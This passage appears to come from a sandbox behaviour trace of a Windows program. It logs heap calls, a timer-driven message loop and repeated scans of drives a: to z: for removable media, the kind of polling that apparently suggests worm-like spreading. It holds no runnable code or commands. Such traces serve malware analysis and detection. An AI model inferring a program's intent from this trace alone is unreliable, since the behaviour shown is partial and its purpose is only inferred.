(HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0217.498] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.498] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.498] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.498] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.498] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0217.498] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0217.498] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.498] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.498] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.499] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.500] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.500] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.500] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.500] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.501] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.501] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.501] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.501] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.501] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.502] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.502] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.502] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.502] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.503] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.503] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.503] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.503] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.504] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.504] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.504] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.504] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.505] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.505] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.505] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.505] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.506] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0217.506] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.506] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0217.506] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.506] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0217.506] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0217.506] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.506] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0217.506] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.506] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.506] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.506] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0217.506] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0217.506] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0217.506] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0217.506] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.507] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.507] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0217.507] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.507] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0217.507] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e60 [0217.507] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.507] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.507] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.507] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.507] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e60 | out: hHeap=0x12c0000) returned 1 [0217.507] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0217.507] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0217.507] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e100 [0217.507] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.507] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e100 | out: hHeap=0x12c0000) returned 1 [0217.507] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.507] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.507] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.507] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.507] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.508] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.508] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.508] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0217.508] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0217.508] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.508] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.508] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0217.508] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.508] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.508] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.508] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0217.508] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.508] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0217.508] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.508] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0217.508] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0217.508] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.508] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.508] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.509] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.509] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0217.509] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.509] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.509] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.509] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.509] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0217.509] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0217.509] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0217.509] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.509] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.510] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.510] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.510] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.510] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.510] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.511] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.511] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.511] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.511] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.512] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.512] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.512] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.512] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.512] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.513] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.513] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.514] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.515] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.515] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.515] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.515] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.515] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.516] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.516] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.516] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.517] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0217.517] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0217.517] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.517] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.517] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.517] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.517] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.517] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.517] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.517] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.517] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.517] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.517] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.517] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0217.517] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.517] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0217.517] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e20 [0217.517] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.517] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.517] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e20 | out: hHeap=0x12c0000) returned 1 [0217.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0217.518] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0217.518] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0217.518] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0217.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.518] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.518] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0217.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0217.518] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0217.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.519] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.519] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.519] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0217.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0217.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.519] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0217.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0217.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.519] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0217.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.519] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.520] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.520] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.520] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.520] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.520] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.521] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.521] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.521] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.521] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.521] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.522] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.522] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.522] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.522] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.522] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.523] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.523] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.523] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.523] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.523] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.524] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.524] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.524] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.525] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.525] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.525] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.525] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.525] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.525] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.525] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.525] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.525] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0217.525] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0217.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0217.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.526] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.526] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0217.526] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0217.526] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0217.526] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0217.526] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.526] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0217.527] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.527] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.527] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260c0 [0217.527] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.527] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.527] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.527] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260c0 | out: hHeap=0x12c0000) returned 1 [0217.527] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.527] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0217.527] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0217.527] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.527] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0217.527] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.527] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.527] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.527] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0217.527] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.527] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0217.527] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.527] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0217.528] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.528] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.528] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.528] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.528] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.528] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.528] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0217.528] RtlAllocateHeap (HeapHandle=0x12c0000, 